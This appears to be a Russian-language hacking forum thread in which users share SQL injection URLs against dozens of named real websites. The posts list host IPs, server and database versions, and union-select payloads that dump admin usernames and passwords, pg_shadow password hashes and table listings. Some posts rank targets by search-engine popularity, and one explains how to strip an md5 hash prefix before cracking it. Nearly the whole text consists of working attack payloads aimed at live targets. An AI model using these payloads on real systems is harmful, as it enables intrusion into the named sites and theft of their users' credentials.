Code: www.jieyanbar.com/jycs.look.php?ID=286 +union+select+1,%String_Col%,3,4,5-- Host IP: 114.113.148.1 Web Server: Apache/2.2.3 (CentOS) Powered-by: PHP/5.1.6 DB Server: MySQL >=5 Current DB: mlyjy Code: topic.0731fdc.com/Mascot/look.php?id=4+union+select 1,2,%String_Col%-- Host IP: 222.240.149.26 Web Server: Apache/2.2.14 (Unix) Powered-by: PHP/5.2.11 DB Server: MySQL >=4.1 Current DB: 0731fc Code: www.lisenok.ru/look.php?id=1781 UNION ALL SELECT %String_Col%,2,3,4,5-- Host IP: 194.135.105.50 Web Server: Apache/1.3.41 (Unix) PHP/5.2.5 Powered-by: PHP/5.2.5 DB Server: MySQL Current DB: db_lisenok1 Code: www.tunahan.org/look.php?bolm=basin&id=3 UNION ALL SELECT 1,%String_Col%,3,4,5,6-- Host IP: 38.113.1.176 Web Server: Apache Powered-by: PHP/5.2.12 DB Server: MySQL unknown ver Current DB: suleyman Code: www.spravkatver.ru/look.php?cat_id=19&c_id=362&id=3449 AND %True_Expression% Host IP: 77.221.130.43 Web Server: nginx/0.6.32 Powered-by: PHP/5.2.6-1+lenny8 DB Server: MySQL Current DB: ),$ Code: www.xmkj.net/look.php?id=45457 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Host IP: 121.199.124.72 Web Server: Apache/2.0.59 (Unix) DAV/2 mod_jk/1.2.26 Powered-by: PHP/4.4.9 DB Server: MySQL unknown ver Current DB: zky081_db Code: www.stalpraas.com/eng/look.php?id=107 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14-- Host IP: 85.17.197.141 Web Server: Apache/2 Powered-by: PHP/5.2.13 DB Server: MySQL Current DB: stalpraa_website Code: www.diysuits.com/look.php?id=513 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9-- Host IP: 69.163.226.1 Web Server: Apache Powered-by: PHP/5.2.13 DB Server: MySQL >=5 Current DB: frsuitssql
https://ws1.gaslightmedia.com/tomsmoms/retail_shop/display_product.phtml?cust_id=&user_num=&cust_status=guest&zip=&prod_id=4+union+select+null,null,null,null,null,null,null,version()::int--+
--Боян-- http://www.supplierdiversityeurope.eu/news_details.php?id=-82+union+select+1,group_concat(0x0b,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+SDE_users-- http://www.dulam.com/news_details.php?id=-9+union+select+1,2,3,group_concat(0x0b,Username,0x3a,Password),5,6,7,8+from+dulam_admin-- http://www.businessanalytica.ru/ru/news/news_details.php?id=-66+union+select+1,2,3,4,group_concat(0x0b,table_name)+from+information_schema.tables-- http://www.melker-online.de/addinol/news_details.php?id=-14+union+select+1,2,3,4,group_concat(0x0b,table_name),6+from+information_schema.tables-- http://www.a1accommodation.com.au/news_details.php?id=-11+union+select+1,2,3,4,group_concat(0x0b,table_name),6+from+information_schema.tables-- http://www.abraxascorp.com/news_details.php?id=-12+union+select+1,2,group_concat(0x0b,admin_login,0x3a,admin_pass),4,5+from+admin--
newmexicohistory.org пр6 тиц10 Code: http://www.newmexicohistory.org/filedetails.php?fileID=23133+union+select+1,2,3,4,concat_ws(0x3a3a,user_name,password)+from+adminUser+--+ gloriousindia.com пр2 Code: http://www.gloriousindia.com/unleashed/place.php?id=-228659+union+select+1,concat_ws(0x3a3a,email,password,name,pwd),3,4,5,6,7,8,9,10+from+user+--+ celadon-international.com пр3 тиц10 Code: http://www.celadon-international.com/place.php?id=-38+union+select+concat_ws(0x3a3a,username,password)+from+wh_users+--+ finance.tut.by пр5 тиц170 Code: http://finance.tut.by/insurance.php?mode=company&id=-1'+union+select+1,2,concat_ws(0x3a3a,id,username,password,email,type),4,5,6,7,8,9,10,11,12,13+from+users+limit+1,100+--+ 10.of.by пр5 тиц210 Code: http://10.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbmV9pz_pz_pz_&md=shop_newsline&news_id=-2272'+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+group+by+table_schema+limit+2,1+--+
http://www.galeriapresenca.pt/site/index.php?pag=noticias&subpag=detalhe&id=51+union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+from+pg_user--
Code: http://www.davico.co.uk/catalogue.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,concat_ws(char(58),version(),user(),database(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9--+ Version: 5.0.83-community-nt User: davico@localhost Database: davico Os: Win32
http://rantburg.com PR-6 // смотрим версию Postgre http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version() as int)+from+pg_user&D=2006-01-30&SO=&HC=1 // смотрим доступ к pg_shadow http://rantburg.com/poparticle.php?ID=141137+union+select+version()::int+from+pg_shadow&D=2006-01-30&SO=&HC=1 //круто! есть доступ к pg_shadow, попробуем вытащить логин и пароль http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1 з.ы хочу напомнить что первые три символа xэша это алгоритм шифрования, в нашем случаe md5, при расшифровке нужно это вырезать
http://www.dwstadium.co.uk/suite.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20-- PR-5 http://www.analisi.ru/info.php?id=-7+union+select+1,group_concat%28column_name%29,3,4%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x70687062625f61636c5f7573657273%20-- PR-60 ТИЦ-3
Скуля: Code: http://www.kuroed.com/?id=158 Колонка: 1 Юзер: kuroed@localhost Версия: 4.1.22-log тИЦ: 90
http://www.alphaonenow.org/info.php?id=-57+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%28column_name%29,2,3,4,5,6,7,8,9,0,1,2%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x76625f61646d696e6973747261746f72%20-- PR-4 http://www.fourstarrealty.com/agent.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20-- PR-3 ТИЦ-10 http://www.premiermontreal.com/agent.php?id=-37+union+select+1,2,3,4,5%20-- http://www.rav-riders.com/doc/motos/moto.php?id=-13+union+select+1,2,user(),4,5,6,7,8,9,0,1,2 -- PR-1 http://www.bullster.com/en/catalogue-moto.php?id=-93312+union+select+1,2,3,4%20-- PR-2 http://katalog.motorky.com/moto.php?id=-98+union+select+1,concat_ws%280x3a,id,username,password%29,3,4,5,6,7,8,9+from+moto_users%20-- PR-4 http://www.banzai-moto.com/concession_kawasaki/banzai-fiche-moto.php?id=-54+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20-- PR-1 http://www.fcl.ru/filial.php?id=-2+union+select+1 -- PR-1 ТИЦ-10
http://infametr.ru/infa/-1079202+'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3+--+ Очень большой траф.
Code: http://www.[COLOR=DarkOrange]smolensk[/COLOR]2.ru/user.php?login=v.v. AND %True_Expression% Host IP: 80.93.48.50 Web Server: Apache/2.2.14 (Fedora) Powered-by: PHP/5.2.9 DB Server: MySQL
http://deti.db.am/play/view/-82977+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21+--+ Поисковая система.
Microsoft SQL Server 2005 MySQL4 под вендой =\ Microsoft SQL Server 2000 с немецкой локализацией PostgreSQL 8.3.7 MySQL5 без каких-либо признаков таблиц с пользовательскими данными..
шоп http://www.eliteshina.ru/tyreinfo.php?id=285+union+select+version()::int,null,null,null,null,null,null+from+pg_user--
Code: http://www.domoticaviva.com/PHP/newsphp.php?id=-804+union+select+1,2,3,version%28%29,5,6,7,8/* Database Version: 4.1.22 Database name: qbs057 User name: [email protected]
http://spb.egent.ru/metro/metro.php?id=-187+union+select+1,2,3%20-- ТИЦ-20 http://www.agentam.ru/metro.php?id=-139+union+select+concat_ws%280x3a,id_ag,nameco,nam,passwd%29+from+users-- ТИЦ-10 PR-2 http://www.cyb-elles.org/popup/institut.php?id=-3+union+select+1,group_concat%28column_name%29,4,2+from+information_schema.columns+where+table_name=0x62645f666f72756d%20-- ТИЦ-10 PR-3
cerd-rj.com.br pr 2 Code: http://www.cerd-rj.com.br/cartilha.php?secao=12-999.9+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- tanaka-usa.com pr 5 тиц 10 Code: http://www.tanaka-usa.com/index.php?section=156-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),9,10,11,12,13,14-- wordsbyrachel.com pr 1 Code: http://wordsbyrachel.com/page.php?go=2-999.9+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)--
http://www.chirurgie-hernie-paris.com/institut.php?id=30+and+substring(version(),1,1)=4--+ Version: 4 ---------------- http://www.ipb-ild.edu.rs/institut.php?id=1027+and+substring(version(),1,1)=3 Version: 3 ---------------- http://www.agentam.ru/metro.php?id=-139+union+select+1--+ User: agent_db@localhost Database: agent_db Version: 5.0.77 CY: 10 PR: 2 Users http://www.agentam.ru/metro.php?id=-139+union+select+concat(id_ag,0x3a,ident,0x3a,nameco,0x3a,stat,0x3a,fam,0x3a,nam,0x3a,ot,0x3a,tel1,0x3a,tel2,0x3a,email,0x3a,www,0x3a,icq,0x3a,acc,0x3a,dat_in,0x3a,dat_last,0x3a,col_recs,0x3a,activ,0x3a,ip,0x3a,passwd,0x3a,logo,0x3a,kod,0x3a,smscode)+from+users+limit+0,1--+
Взрыв мозга, MySQL5. Есть таблицы cpg14x_users fe_users be_users evo_users, но на их просмотр, судя по всему, нет прав
